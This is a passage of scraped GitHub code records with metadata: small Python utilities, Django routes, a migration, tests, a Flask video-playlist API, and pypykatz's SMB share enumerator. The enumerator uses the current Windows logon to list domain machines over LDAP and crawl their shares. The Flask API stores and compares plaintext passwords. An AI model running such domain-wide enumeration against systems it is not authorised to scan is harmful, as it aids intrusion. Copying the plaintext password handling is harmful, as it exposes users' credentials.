"call"}, {"api_name": "selenium.webdriver", "line_number": 27, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.NAME", "line_number": 31, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 31, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.RETURN", "line_number": 33, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 33, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 35, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 35, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 39, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 39, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 40, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 40, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 41, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 41, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 42, 
"usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 42, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 43, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 43, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 44, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 44, "usage_type": "name"}, {"api_name": "csv.writer", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "6679857745", "text": "from collections import Counter\nimport os\n\n\ndef get_words_perline(file_name):\n \"\"\"\n 获取每行的单词\n :type file_name: 文件名\n \"\"\"\n lines = []\n\n if os.path.exists(file_name):\n with open(file_name, 'r') as f:\n for line in f:\n lines.append(line.split())\n return lines\n\n\ndef get_word_count(file_name):\n \"\"\"\n 统计单词出现次数\n :type file_name: 文件名\n \"\"\"\n lines = get_words_perline(file_name)\n cnt = Counter()\n for line in lines:\n cnt = cnt + Counter(line)\n return cnt\n\n\ndef get_import_word(file_name):\n cnt = get_word_count(file_name)\n print(cnt)\n import_list = cnt.most_common(1)\n print('the most import word is:' + import_list[0][0])\n\nif __name__ == \"__main__\":\n get_import_word(\"word.txt\")\n", "repo_name": "Sesshoumaru/python-exercise", "sub_path": "0007/codes/0006.py", "file_name": "0006.py", "file_ext": "py", "file_size_in_byte": 810, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "collections.Counter", "line_number": 25, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "23096688333", "text": "from django.conf.urls import include, url\nfrom vsf_user.front import views\n\n\nurlpatterns = [\n url(\n r'^list-apikey/$',\n views.ListAPIUsers.as_view(),\n name='api-users-list'\n ),\n url(\n r'^list-apikey-ajax/$',\n views.APIUsersDataTableAjax.as_view(),\n ),\n url(\n r'^(?P[0-9]+)/delete-apikey/$',\n views.DeleteAPIUsers.as_view(),\n name='api-users-delete'\n ),\n\n]\n", "repo_name": "VEinteligente/vsf-incidents-server", "sub_path": "vsf_user/front/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 439, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "vsf_user.front.views.ListAPIUsers.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "vsf_user.front.views.ListAPIUsers", "line_number": 8, "usage_type": "attribute"}, {"api_name": "vsf_user.front.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "vsf_user.front.views.APIUsersDataTableAjax.as_view", "line_number": 13, "usage_type": "call"}, {"api_name": "vsf_user.front.views.APIUsersDataTableAjax", "line_number": 13, "usage_type": "attribute"}, {"api_name": "vsf_user.front.views", "line_number": 13, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "vsf_user.front.views.DeleteAPIUsers.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": 
"vsf_user.front.views.DeleteAPIUsers", "line_number": 17, "usage_type": "attribute"}, {"api_name": "vsf_user.front.views", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "10461658798", "text": "from PIL import ImageFont, ImageDraw, Image\nimport argparse\n# https://blog.gtwang.org/programming/opencv-drawing-functions-tutorial/\n\ndef paste(name, output):\n image = Image.open(\"./base.png\")\n drawer = ImageDraw.Draw(image)\n name_len = len(name)\n if name_len == 4:\n font = ImageFont.truetype(\"./標楷體.ttf\", 68)\n drawer.text((922, 853), name, font=font, fill=(0, 0, 0))\n elif name_len == 5:\n font = ImageFont.truetype(\"./標楷體.ttf\", 55)\n drawer.text((918, 858), name, font=font, fill=(0, 0, 0))\n elif name_len == 6:\n font = ImageFont.truetype(\"./標楷體.ttf\", 50)\n drawer.text((912, 862), name, font=font, fill=(0, 0, 0))\n else:\n raise NotImplementedError\n image.save(output)\n\ndef main(args):\n name = args.name + \"同學\" if args.student else args.name\n paste(name, args.output)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"name\", type=str)\n parser.add_argument(\"output\", type=str)\n parser.add_argument(\"--student\", action=\"store_true\", default=False)\n args = parser.parse_args()\n \n main(args)\n", "repo_name": "jimlinntu/gbc-paste", "sub_path": "paste.py", "file_name": "paste.py", "file_ext": "py", "file_size_in_byte": 1145, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PIL.Image.open", "line_number": 6, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 6, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 7, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 10, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 10, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 13, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 13, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 16, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 16, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "4585676599", "text": "\"\"\"empty message\n\nRevision ID: 4744a3a56f55\nRevises: 97fd285963c7\nCreate Date: 2020-01-18 20:10:06.316710\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '4744a3a56f55'\ndown_revision = '97fd285963c7'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('person', sa.Column('address', sa.String(length=200), nullable=False))\n op.add_column('person', sa.Column('phone', sa.String(length=20), nullable=False))\n op.create_unique_constraint(None, 'person', ['address'])\n op.create_unique_constraint(None, 'person', ['phone'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_constraint(None, 'person', type_='unique')\n op.drop_constraint(None, 'person', type_='unique')\n op.drop_column('person', 'phone')\n op.drop_column('person', 'address')\n # ### end Alembic commands ###\n", "repo_name": "Rhpozzo/FlaskAPI", "sub_path": "migrations/versions/4744a3a56f55_.py", "file_name": "4744a3a56f55_.py", "file_ext": "py", "file_size_in_byte": 1018, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.add_column", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op.create_unique_constraint", "line_number": 23, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 23, "usage_type": "name"}, {"api_name": "alembic.op.create_unique_constraint", "line_number": 24, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 24, "usage_type": "name"}, {"api_name": "alembic.op.drop_constraint", "line_number": 30, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 30, "usage_type": "name"}, {"api_name": "alembic.op.drop_constraint", "line_number": 31, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 31, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 32, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 32, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 33, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "20124023132", "text": "from msldap.commons.factory import LDAPConnectionFactory\nfrom aiosmb.examples.smbshareenum import SMBFileEnum, ListTargetGen, FileTargetGen\n\ndef get_smb_url(authmethod = 'ntlm', protocol_version = '2', host = None):\n\tfrom winacl.functions.highlevel import get_logon_info\n\tinfo = get_logon_info()\n\tlogonserver = info['logonserver']\n\tif host is not None:\n\t\tlogonserver = host\n\n\treturn 'smb%s+sspi-%s://%s\\\\%s@%s' % (protocol_version, authmethod, info['domain'], info['username'], logonserver)\n\n\ndef get_ldap_url(authmethod = 'ntlm', host = None):\n\tfrom winacl.functions.highlevel import get_logon_info\n\tinfo = get_logon_info()\n\n\tlogonserver = info['logonserver']\n\tif host is not None:\n\t\tlogonserver = host\n\n\treturn 'ldap+sspi-%s://%s\\\\%s@%s' % (authmethod, info['domain'], info['username'], logonserver)\n\nclass LDAPTargetGen:\n\tdef __init__(self, url):\n\t\tself.url = url\n\t\n\tasync def generate(self):\n\t\ttry:\n\t\t\tconn_url = LDAPConnectionFactory.from_url(self.url)\n\t\t\tconnection = conn_url.get_client()\n\t\t\t_, err = await connection.connect()\n\t\t\tif err is not None:\n\t\t\t\traise err\n\t\t\t\n\t\t\tadinfo = connection._ldapinfo\n\t\t\tdomain_name = adinfo.distinguishedName.replace('DC','').replace('=','').replace(',','.')\n\n\t\t\tasync for machine, err in connection.get_all_machines(attrs=['sAMAccountName', 'dNSHostName', 'objectSid']):\n\t\t\t\tif err is not None:\n\t\t\t\t\traise err\n\t\t\t\t\t\n\t\t\t\tdns 
= machine.dNSHostName\n\t\t\t\tif dns is None:\n\t\t\t\t\tdns = '%s.%s' % (machine.sAMAccountName[:-1], domain_name)\n\t\t\t\t\n\t\t\t\tyield str(machine.objectSid), str(dns), None\n\n\t\texcept Exception as e:\n\t\t\tyield None, None, e\n\t\n\nasync def shareenum(smb_url, ldap_url = None, targets = None, smb_worker_count = 10, depth = 3, out_file = None, progress = False, max_items = None, dirsd = False, filesd = False, authmethod = 'ntlm', protocol_version = '2', output_type = 'str', max_runtime = None, exclude_share = ['print$'], exclude_dir = [], exclude_target = []):\n\n\tif smb_url == 'auto':\n\t\tsmb_url = get_smb_url(authmethod=authmethod, protocol_version=protocol_version)\n\t\n\tenumerator = SMBFileEnum(\n\t\tsmb_url,\n\t\tworker_count = smb_worker_count, \n\t\tdepth = depth, \n\t\tout_file = out_file, \n\t\tshow_pbar = progress,\n\t\tmax_items = max_items,\n\t\tfetch_dir_sd = dirsd,\n\t\tfetch_file_sd = filesd,\n\t\toutput_type = output_type,\n\t\tmax_runtime = max_runtime,\n\t\texclude_share = exclude_share,\n\t\texclude_dir = exclude_dir,\n\t\texclude_target = exclude_target\n\t)\n\t\n\tnotfile = []\n\tif targets is not None:\n\t\tfor target in targets:\n\t\t\ttry:\n\t\t\t\tf = open(target, 'r')\n\t\t\t\tf.close()\n\t\t\t\tenumerator.target_gens.append(FileTargetGen(target))\n\t\t\texcept:\n\t\t\t\tnotfile.append(target)\n\t\t\n\t\tif len(notfile) > 0:\n\t\t\tenumerator.target_gens.append(ListTargetGen(notfile))\n\t\n\tif ldap_url is not None:\n\t\tif ldap_url == 'auto':\n\t\t\tldap_url = get_ldap_url(authmethod=authmethod)\n\t\tenumerator.target_gens.append(LDAPTargetGen(ldap_url))\n\n\tif len(enumerator.target_gens) == 0:\n\t\tenumerator.enum_url = True\n\t\t#raise Exception('No suitable targets found!')\n\n\tawait enumerator.run()\n", "repo_name": "skelsec/pypykatz", "sub_path": "pypykatz/smb/shareenum.py", "file_name": "shareenum.py", "file_ext": "py", "file_size_in_byte": 2987, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2505, "dataset": "github-code", "pt": "53", "api": [{"api_name": "winacl.functions.highlevel.get_logon_info", "line_number": 6, "usage_type": "call"}, {"api_name": "winacl.functions.highlevel.get_logon_info", "line_number": 16, "usage_type": "call"}, {"api_name": "msldap.commons.factory.LDAPConnectionFactory.from_url", "line_number": 30, "usage_type": "call"}, {"api_name": "msldap.commons.factory.LDAPConnectionFactory", "line_number": 30, "usage_type": "name"}, {"api_name": "aiosmb.examples.smbshareenum.SMBFileEnum", "line_number": 58, "usage_type": "call"}, {"api_name": "aiosmb.examples.smbshareenum.FileTargetGen", "line_number": 80, "usage_type": "call"}, {"api_name": "aiosmb.examples.smbshareenum.ListTargetGen", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "34256755892", "text": "#!/usr/bin/env python\n\"\"\"Tests for `dlink` package.\"\"\"\nimport os\nfrom argparse import Namespace\nfrom pathlib import Path\n\nimport pytest\n\nfrom dlink import core\n\n\n@pytest.fixture\ndef populate(tmp_path):\n # At the risk of this not being super clear.\n # 1. 
Make a directory and a bunch of files.\n base = tmp_path / \"base\"\n base.mkdir()\n for i in range(5):\n # This is kinda sloppy because / makes a new directory and I'm genuinely\n # unsure of what the clean way to concatenate strings and Paths together\n (base / (str(i) + \".txt\")).write_text(\"Foo\")\n\n return base\n\n\n@pytest.fixture\ndef args(tmp_path, populate):\n namespace = Namespace()\n namespace.destination = populate\n namespace.log = True\n namespace.log_level = 10\n namespace.recursive = False\n namespace.glob_pattern = \"\"\n namespace.source = tmp_path / \"src\"\n namespace.source.mkdir()\n return namespace\n\n\ndef test_symlink(tmp_path):\n d = tmp_path\n d.mkdir(exist_ok=True)\n dest = d / \"any_file.txt\"\n dest.write_text(\"Probably not necessary\")\n # Start with a path object. Then parameterize this?\n src = tmp_path / \"link\"\n core.symlink(src, dest)\n assert Path.is_symlink(src)\n assert Path.is_file(dest)\n\n\ndef test_generate_dest(populate):\n ret = core.generate_dest(populate)\n for i in range(5):\n file = populate / (str(i) + \".txt\")\n assert file == ret[i]\n\n\ndef test_main(args):\n os.chdir(args.source)\n core.main(args)\n assert \"0.txt\" in os.listdir()\n\n\ndef test_logging(args, caplog):\n os.chdir(args.source)\n core.main(args)\n for record in caplog.records:\n assert record.levelname != \"ERROR\"\n\n\nif __name__ == \"__main__\":\n pytest.main()\n", "repo_name": "farisachugthai/dlink", "sub_path": "tests/test_dlink.py", "file_name": "test_dlink.py", "file_ext": "py", "file_size_in_byte": 1725, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest.fixture", "line_number": 12, "usage_type": "attribute"}, {"api_name": "argparse.Namespace", "line_number": 28, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 26, "usage_type": "attribute"}, {"api_name": "dlink.core.symlink", "line_number": 46, "usage_type": "call"}, {"api_name": "dlink.core", "line_number": 46, "usage_type": "name"}, {"api_name": "pathlib.Path.is_symlink", "line_number": 47, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 47, "usage_type": "name"}, {"api_name": "pathlib.Path.is_file", "line_number": 48, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 48, "usage_type": "name"}, {"api_name": "dlink.core.generate_dest", "line_number": 52, "usage_type": "call"}, {"api_name": "dlink.core", "line_number": 52, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 59, "usage_type": "call"}, {"api_name": "dlink.core.main", "line_number": 60, "usage_type": "call"}, {"api_name": "dlink.core", "line_number": 60, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 61, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 65, "usage_type": "call"}, {"api_name": "dlink.core.main", "line_number": 66, "usage_type": "call"}, {"api_name": "dlink.core", "line_number": 66, "usage_type": "name"}, {"api_name": "pytest.main", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "13020101618", "text": "from flask import Flask, make_response, request\nimport os\nfrom crud import Crud\nfrom routes_helper import RoutesHelper\nfrom flask_cors import CORS\n\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": \"http://127.0.0.1:5000\"}})\n\n@app.route('/api/register', methods=['POST'])\ndef register():\n user_table = Crud('user')\n users = user_table.get_all_elements()\n json = request.json\n user_in_bd = False\n\n 
if all(key in json.keys() for key in ['email', 'pw', 'name']):\n for user in users:\n if(user['email'] == json['email']):\n user_in_bd = True\n if(not user_in_bd):\n cols, values = RoutesHelper.insert_element('user', json.items())\n user_holder = user_table.getElements_and_operator(cols, values)\n user_row = user_holder[0]\n user_id = user_row['id']\n return make_response({\n 'message': 'Utilizador criado com sucesso.',\n 'user_id': user_id\n }),201\n else:\n return make_response({\"error\": \"Já existe uma conta com este email.\"}), 409\n else:\n message = 'Missing required fields'\n return make_response({'error': message}), 400\n\n\n@app.route('/api/login', methods=['POST'])\ndef login():\n email = request.json.get('email')\n password = request.json.get('pw')\n\n users_table = Crud('user')\n users = users_table.getElements_and_operator(['email', 'pw'], [email, password])\n if(users):\n for user in users:\n if(user['email'] == email and user['pw'] == password):\n message = {\"message\": \"Log in com sucesso.\", 'user_id': user['id']}\n return make_response(message), 200\n message = {'error': 'Email ou Password invalidos. '}\n return make_response(message), 401\n\n@app.route('/api/google/login', methods=['POST'])\ndef login_google():\n req = request.json\n\n name = req.get('name')\n email = req.get('email')\n password = req.get('pw')\n\n if not (name and email and password):\n return make_response({'error':'Está em falta name ou email ou uid no body do request.'})\n\n users_table = Crud('user')\n users = users_table.getElements_and_operator(['email', 'pw'], [email, password])\n\n if(users):\n for user in users:\n if(user['email'] == email and user['pw'] == password):\n message = {\"message\": \"Log in com sucesso.\", 'user_id': user['id']}\n return make_response(message), 200\n \n user_table = Crud('user')\n cols, values = RoutesHelper.insert_element('user', req.items())\n user_holder = user_table.getElements_and_operator(cols, values)\n user_row = user_holder[0]\n user_id = user_row['id']\n return make_response({\n 'message': 'Utilizador criado com sucesso.',\n 'user_id': user_id\n }),201\n\n\n@app.route('/api/user/', methods=['GET'])\ndef get_user(id_user):\n\n user_handler = Crud('user')\n user = user_handler.get_element_by_pk(id_user, 'id')\n\n if user:\n return make_response(user)\n \n return make_response({'error':'Este utilizador não existe.'})\n\n@app.route('/api/videos/', methods=['GET'])\ndef get_video_details(id):\n video_handler = Crud('video')\n video_details = video_handler.get_element_by_pk(id,'id')\n\n if video_details:\n likes_handler = Crud('likes_video')\n like_count = likes_handler.count('id_video', video_details['id']) \n dislikes_handler = Crud('dislikes_video')\n dislikes_count = dislikes_handler.count('id_video', video_details['id'])\n video_details.update({'likes': like_count, 'dislikes': dislikes_count})\n return make_response(video_details), 200\n \n return make_response({'error':'Video nao encontrado.'}), 404\n\n@app.route('/api/videos/view/', methods=['POST'])\ndef increment_view(id_video):\n video_handler = Crud('video')\n \n video_details = video_handler.get_element_by_pk(id_video,'id')\n if video_details:\n video_handler.update_element(id_video,['views'], [video_details['views'] + 1], 'id')\n new_video_details = video_handler.get_element_by_pk(id_video,'id')\n \n if new_video_details:\n likes_handler = Crud('likes_video')\n like_count = likes_handler.count('id_video', new_video_details['id']) \n dislikes_handler = Crud('dislikes_video')\n dislikes_count = 
dislikes_handler.count('id_video', new_video_details['id'])\n new_video_details.update({'likes': like_count, 'dislikes': dislikes_count})\n \n return make_response(new_video_details), 200\n \n return make_response({'error':'Este video não existe.'})\n\n\n@app.route('/api/videos/like', methods=['POST'])\ndef add_like():\n\n id_user = request.json.get('id_user')\n id_video = request.json.get('id_video')\n \n likes_handler = Crud('likes_video')\n user_handler = Crud('user')\n video_handler = Crud('video')\n\n valid_user = user_handler.get_element_by_pk(id_user, 'id')\n valid_video = video_handler.get_element_by_pk(id_video, 'id')\n\n if not valid_user:\n return make_response({'message': f'O utilizador {id_user} não existe.'}), 400\n\n if not valid_video:\n return make_response({'message': f'O video {id_video} não existe.'}), 400\n\n row_likes = likes_handler.get_elements_by_string_field('id_video', id_video)\n \n if id_user in [bd_user_id['id_user'] for bd_user_id in row_likes]:\n return make_response({'message': f'O utilizador {id_user} já deu like neste vídeo.'}), 400\n else:\n likes_handler.insert(['id_user', 'id_video'], [id_user, id_video])\n return make_response({\n 'id_user':id_user,\n 'id_video':id_video,\n 'message': f'O utilizador {id_user} deu like no vídeo de ID {id_video}.'\n }) \n\n\n@app.route('/api/videos/dislike', methods=['POST'])\ndef add_dislike():\n\n id_user = request.json.get('id_user')\n id_video = request.json.get('id_video')\n \n dislikes_handler = Crud('dislikes_video')\n user_handler = Crud('user')\n video_handler = Crud('video')\n\n valid_user = user_handler.get_element_by_pk(id_user, 'id')\n valid_video = video_handler.get_element_by_pk(id_video, 'id')\n\n if not valid_user:\n return make_response({'message': f'O utilizador {id_user} não existe.'}), 400\n\n if not valid_video:\n return make_response({'message': f'O video {id_video} não existe.'}), 400\n\n row_likes = dislikes_handler.get_elements_by_string_field('id_video', id_video)\n \n if id_user in [bd_user_id['id_user'] for bd_user_id in row_likes]:\n return make_response({'message': f'O utilizador {id_user} já deu dislike neste vídeo.'}), 400\n else:\n dislikes_handler.insert(['id_user', 'id_video'], [id_user, id_video])\n return make_response({\n 'id_user':id_user,\n 'id_video':id_video,\n 'message': f'O utilizador {id_user} deu dislike no vídeo de ID {id_video}.'\n }) \n\n@app.route('/api/videos//comments', methods=['GET'])\ndef get_comments(id_video):\n \n comments_handler = Crud('comments_video')\n comments_video = comments_handler.get_elements_by_string_field('id_video', id_video)\n user_handler = Crud('user')\n\n if id_video not in [row['id_video'] for row in comments_video]:\n return make_response({'message': f'O vídeo de ID {id_video} não possui comentários.'}), 404\n\n for row in comments_video:\n user = user_handler.get_element_by_pk(row['id_user'], 'id')\n row.update({'name':user['name']})\n\n return make_response(comments_video)\n\n@app.route('/api/videos//comments', methods=['POST'])\ndef add_comment(id_video):\n \n id_user = request.json.get('id_user')\n comment_desc = request.json.get('comment')\n\n user_handler = Crud('user')\n video_handler = Crud('video')\n\n valid_user = user_handler.get_element_by_pk(id_user, 'id')\n valid_video = video_handler.get_element_by_pk(id_video, 'id')\n\n if not valid_user:\n return make_response({'message': f'O utilizador {id_user} não existe.'}), 400\n\n if not valid_video:\n return make_response({'message': f'O video {id_video} não existe.'}), 400\n \n 
comment_handler = Crud('comments_video')\n comment_handler.insert(['id_user', 'id_video', 'descr'], [id_user, id_video, comment_desc])\n \n return make_response({'message': 'Comentário adicionado com sucesso.'})\n\n@app.route('/api/videos/comments/', methods=['DELETE'])\ndef delete_comment(comment_id):\n comments_handler = Crud('comments_video')\n comment = comments_handler.get_element_by_pk(comment_id, 'id')\n \n if comment:\n comments_handler.delete_element(comment_id, 'id')\n return make_response({'message': f'Comentário de ID {comment_id} foi excluído com sucesso.'}), 200\n \n return make_response({'message': f'O comentário de ID {comment_id} não foi encontrado.'}), 404\n \n@app.route('/api/playlists', methods=['POST'])\ndef create_playlist():\n \n playlist_name = request.json.get('name')\n id_user = request.json.get('id_user')\n \n if playlist_name and id_user:\n user_list_handler = Crud('user_list')\n user_list_handler.insert(['id_user', 'name'],[id_user, playlist_name])\n else:\n return make_response({'message': 'O id do utilizador e o nome da playlist são obrigatórios.'}), 403\n\n\n return make_response({'message': 'Playlist criada com sucesso.'}), 201\n\n@app.route('/api/playlists', methods=['DELETE'])\ndef delete_playlist():\n req = request.json\n list_id = req.get('id')\n if list_id:\n list_handler = Crud('user_list')\n video_handler = Crud('video_list')\n video_handler.delete_element(list_id, 'id_user_list')\n list_handler.delete_element(list_id, 'id')\n return make_response({'message':'Playlist removida com sucesso.'})\n else:\n return make_response({'error':'Id da playlist em falta.'}), 404\n\n@app.route('/api/playlists/videos', methods=['POST'])\ndef add_video_to_playlist():\n \n req = request.json\n id_user_list = req.get('id_user_list')\n id_video = req.get('id_video')\n \n video_handler = Crud('video')\n video_in_db = video_handler.get_element_by_pk(id_video, 'id')\n\n user_list_handler = Crud('user_list')\n user_list_in_db = user_list_handler.get_element_by_pk(id_user_list, 'id')\n\n if not video_in_db:\n return make_response({'error': 'Este video não existe.'})\n \n if not user_list_in_db:\n return make_response({'error': 'Esta playlist não existe.'})\n\n if id_video and id_user_list:\n cols = []\n values = []\n\n for col, value in req.items():\n cols.append(col)\n values.append(value)\n\n handler = Crud('video_list')\n in_db = handler.getElements_and_operator(cols, values)\n if not in_db:\n handler.insert(cols, values)\n return make_response({'message':'Video inserido à playlist com sucesso.'}), 200\n else:\n return make_response({'message':'Este video já existe na playlist.'}), 200\n \n else:\n return make_response({'error': 'Id da playlist ou id do utilizador em falta.'}), 404\n\n@app.route('/api/playlists/videos', methods=['DELETE'])\ndef del_video_from_playlist():\n \n req = request.json\n id_user_list = req.get('id_user_list')\n id_video = req.get('id_video')\n\n if id_video and id_user_list:\n cols = []\n values = []\n\n for col, value in req.items():\n cols.append(col)\n values.append(value)\n\n handler = Crud('video_list')\n in_db = handler.getElements_and_operator(cols, values)\n if not in_db:\n return make_response({'error':'Este video não existe na playlist.'}), 200\n else:\n handler.delete_element(in_db[0]['id'], 'id')\n return make_response({'message':'O video foi removido com sucesso.'}), 200\n \n else:\n return make_response({'error': 'Id da playlist ou id do utilizador em falta.'}), 404\n\n@app.route('/api/playlists/', methods=['GET'])\ndef 
get_playlist(id_user):\n\n playlist_handler = Crud('user_list')\n playlists = playlist_handler.get_elements_by_string_field('id_user', id_user)\n \n if playlists:\n return make_response(playlists)\n \n return make_response({'message': 'Este utilizador não tem playlists.'})\n\n\n@app.route('/api/playlists/videos/', methods=['GET'])\ndef get_videos_from_playlist(id_playlist):\n\n playlist_handler = Crud('video_list')\n videos = playlist_handler.get_elements_by_string_field('id_user_list', id_playlist)\n \n if videos:\n return make_response(videos)\n \n return make_response({'message': 'Esta playlist não existe ou está vazia.'})\n \n@app.route('/api/videos/top/', methods=['GET'])\ndef get_top_vieos(n_top):\n handler = Crud('video')\n result = handler.get_top(n_top, 'views')\n \n if result:\n return make_response(result)\n \n return make_response({'error':'Ups alguma coisa correu mal.'})\n\n@app.route('/api/videos/youtube/', methods=['GET'])\ndef get_video_id_from_id_platform(id_platform):\n handler = Crud('video')\n\n y_video = handler.get_elements_by_string_field('id_platform', id_platform)\n\n if y_video:\n return make_response(y_video[0]), 200\n \n handler.insert(['id_platform', 'platform', 'views'], [id_platform, 'youtube', 0])\n y_video = handler.get_elements_by_string_field('id_platform', id_platform)\n \n if y_video:\n return make_response(y_video[0]), 200\n \n return make_response({'error':'Ups algo correu mal.'}), 400\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=os.getenv(\"PORT\", default=5000))\n", "repo_name": "ThunderShake/sd_api", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 13896, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 9, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "routes_helper.RoutesHelper.insert_element", "line_number": 23, "usage_type": "call"}, {"api_name": "routes_helper.RoutesHelper", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 62, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 64, 
